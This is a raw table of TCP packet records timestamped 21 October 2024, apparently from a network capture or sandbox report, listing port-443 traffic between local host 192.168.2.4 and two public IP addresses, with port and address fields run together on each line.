                                                                                      Oct 21, 2024 11:16:45.228265047 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.110109091 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.110256910 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.111232996 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.111321926 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.159521103 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.159538031 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.160470009 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.160540104 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.163420916 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.207438946 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.535521030 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.535753012 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.535753012 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.535828114 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.536058903 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:46.557259083 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:46.557296991 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.557384014 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:46.557579994 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:46.557595015 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:47.441149950 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:47.441346884 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:47.444875956 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:47.444889069 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:47.445278883 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:47.446165085 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:47.446444988 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:47.491409063 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:49.940116882 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:49.940237045 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:49.948281050 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:49.948357105 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.054821968 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.054904938 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.054922104 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.054974079 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.055015087 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.055064917 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.055097103 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.055141926 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.070341110 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.070434093 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.070447922 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.070488930 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.075006962 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.075057030 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.075112104 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.075294971 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.084822893 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.084887028 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.084971905 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.085022926 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.170561075 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.170640945 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.170655012 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.170702934 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.170751095 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.170797110 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.170835018 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.170881033 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.170927048 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.170975924 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.185920954 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.185972929 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.186048031 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.186108112 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.190778017 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.190826893 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.190856934 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.190907955 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.200396061 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.200459957 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.200474977 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.200520039 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.200597048 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.200648069 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.286297083 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.286412954 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.286482096 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.286537886 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.286578894 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.286643982 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.286659002 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.286729097 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.301959991 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.302011967 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.302074909 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.302304983 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.306886911 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.306941032 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.306966066 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.307015896 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.316271067 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.316329956 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.316359997 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.316410065 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.316451073 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.316504002 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.402069092 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.402203083 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.402240038 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.402295113 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.402331114 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.402379036 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.402435064 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.402482033 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.402512074 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.402559996 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.417670012 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.417740107 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.417752028 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.417800903 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.417850971 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.417917013 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.422342062 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.422398090 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.422421932 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.422468901 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.431993961 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.432054996 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.432076931 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.432123899 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.434320927 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.434377909 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.474993944 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.475065947 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.517678022 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.517776012 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.517787933 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.517848015 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.517918110 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.517976046 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.533484936 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.533560038 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.533571959 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.533642054 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.538003922 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.538074017 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.538084030 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.538130999 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.547725916 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.547785044 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.547842026 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.547894001 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.550184965 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.550242901 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.550256968 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.550304890 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.631314993 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.631401062 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.633698940 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.633752108 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.633774042 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.633871078 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.633897066 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.633939981 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.649431944 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.649488926 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.649504900 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.649552107 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.649585009 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.649632931 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.653769970 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.653816938 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.653852940 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.653896093 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.654059887 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.654099941 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.654150963 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.654192924 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.663516998 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.663559914 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.663635015 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.663672924 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.665994883 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.666038990 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.666085958 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.666126013 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.749478102 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.749644995 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.749660015 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.749707937 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.765012026 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.765165091 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.765172958 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.765219927 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.769747972 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.769802094 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.769844055 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.769887924 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.769934893 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.769979954 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.770025015 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.770070076 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.779433966 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.779489994 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.779552937 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.779593945 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.782016039 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.782067060 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.782119036 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.782222986 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.782289028 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.782340050 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.865334034 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.865410089 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.865446091 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.865489960 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.865550995 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.865602970 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.880806923 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.880883932 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.880927086 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.880975962 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.885493040 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.885567904 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.885593891 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.885644913 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.885711908 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.885761976 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.885823965 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.885864019 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.895147085 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.895216942 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.895250082 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.895375013 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.895503044 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.895560026 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.897643089 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.897705078 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.897738934 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.897797108 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.897833109 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.897883892 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.981230974 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.981307030 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.981345892 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.981400013 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.996617079 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.996673107 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:50.996737957 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:50.996787071 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.001310110 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.001359940 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.001405001 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.001455069 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.001501083 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.001554012 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.001609087 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.001662016 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.011168003 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.011239052 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.011310101 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.011363029 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013350964 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013402939 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013446093 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013508081 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013547897 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013597965 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013654947 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013703108 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013746977 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013797045 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.013847113 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.013894081 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.096904993 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.096988916 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.097032070 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.097083092 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.112421036 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.112492085 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.112525940 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.112572908 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.117065907 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.117117882 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.117202997 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.117247105 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.117300034 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.117348909 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.117396116 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.117444992 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.126928091 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.126979113 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.127042055 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.127084970 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.129075050 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.129126072 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.129189014 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.129252911 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.129282951 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.129336119 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.129410028 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.129465103 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.175163031 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.175239086 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.175307035 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.175359964 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.438674927 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.438900948 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.438924074 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.438941956 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.438956976 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.438992977 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439004898 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439052105 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439100027 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439151049 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439202070 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439253092 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439328909 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439376116 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439481020 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439529896 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439594984 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439644098 CEST49737443192.168.2.4142.250.186.33
                                                                                      Oct 21, 2024 11:16:51.439687967 CEST44349737142.250.186.33192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.439738989 CEST49737443192.168.2.4142.250.186.33
